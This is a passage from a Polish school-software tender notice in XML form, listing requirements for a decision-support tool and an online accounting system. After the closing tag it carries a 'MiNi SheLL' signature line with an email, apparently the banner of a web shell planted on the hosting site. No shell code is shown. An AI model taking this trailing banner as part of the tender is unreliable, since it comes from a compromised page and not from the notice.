•	możliwość otwierania modułów w wielu zakładkach;
•	praca sieciowa wielu użytkowników programu.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
8.	System wspomagania decyzji, analizujący dane 	-na 16 stanowisk
komputerowych
Wymagania minimalne:

•	prezentowanie zestawień  w arkuszu kalkulacyjnym Microsoft Excel w postaci interaktywnych wielowymiarowych tabel i wykresów. 
•	sortowanie tabel,
•	filtrowanie danych,
•	dokonywanie podsumowań na dowolnym poziomie,
•	korzystanie z całego zestawu różnorodnych funkcji statystycznych (m.in. średnia, minimum, maksimum, odchylenie standardowe),
•	przechodzenie od danych zagregowanych do danych szczegółowych i odwrotnie,
•	korzystanie z predefiniowanych formatów tabel,
•	zmiana typu wykresu (słupkowe, kołowe, punktowe, 2-D, 3-D).
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
9. 	Internetowe biuro rachunkowe	-na 16 stanowisk
komputerowych
Wymagania minimalne:
•	Zarządzanie bazą klientów on-line.
•	Zarządzanie fakturami i historią rozliczeń klientów.
•	Import faktur z innych programów magazynowo-sprzedażowych 
•	Dopasowanie skanów z archiwum z zaimportowanymi danymi z pliku na podstawie danych OCR.
•	Możliwość przesyłania dokumentów e-mailem.
•	Baza dokumentów – skanowanie, OCR i automatyczne rozpoznawanie pól, wyszukiwanie, eksport dokumentów.
•	 Wymiana dokumentami. Konfiguracja uprawnień według typu dokumentu. Komentowanie dokumentów.
•	Zarządzanie kadrami klientów, możliwość przesyłania gotowych list płac, RMUA i innych dokumentów kadrowych.
•	Rozliczenia klienta – swobodny wgląd w wyniki finansowe klienta (zarówno przez biuro, jak i samego klienta).
•	Powiadomienia klienta o ważnych terminach przez e-mail i SMS.
•	Zarządzanie kartotekami kontrahentów.
•	Istnienie opcji wystawiania faktur.
•	Zarządzanie fakturami.
•	Baza dokumentów – wymiana dokumentami. Konfiguracja uprawnień wg. typu dokumentu.
•	Komentowanie dokumentów. Możliwość przesyłania dokumentów e-mailem.
•	Zarządzanie pracownikami (lista pracowników) oraz dokumentami kadrowymi.
•	Zarządzanie urlopami – dodawanie wniosków i ich akceptacja elektroniczna. Konfigurowalna struktura akceptacji. Powiadomienia i raporty. Dostęp do informacji o stanie urlopu.
•	Analiza rozliczeń księgowych firmy na przejrzystych wykresach.
•	Dostęp do wszystkich faktur 24h na dobę przez 7 dni w tygodniu.
•	Brak konieczności pracy na dokumentach w formie papierowej (ograniczenie do minimum potrzeby drukowania dokumentów).
•	Zarządzanie wszystkimi dokumentami z jednego miejsca.
•	Bezpieczeństwo i poufność danych (wszystkie dane są w pełni zapewnione przez szyfr SSL), pełna zgodność z zapisami GIODO.
•	Ułatwienie dla biura rachunkowego w zdobywaniu nowych klientów – wizerunek profesjonalnego biura rachunkowego.
•	Łatwa, intuicyjna obsługa systemu – brak konieczności instalacji programu, zakupu specjalnego sprzętu czy szkolenia pracowników.
Do użytku szkolnego.
Kompatybilne z SO Windows 10 i starszymi.
Aktualizacje i serwis techniczny do 2023 r.
</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>48000000-8</cpv1c><czas>
              O
            </czas><czas_dni>5</czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1>cena</kryt_1><kryt_1p>60</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com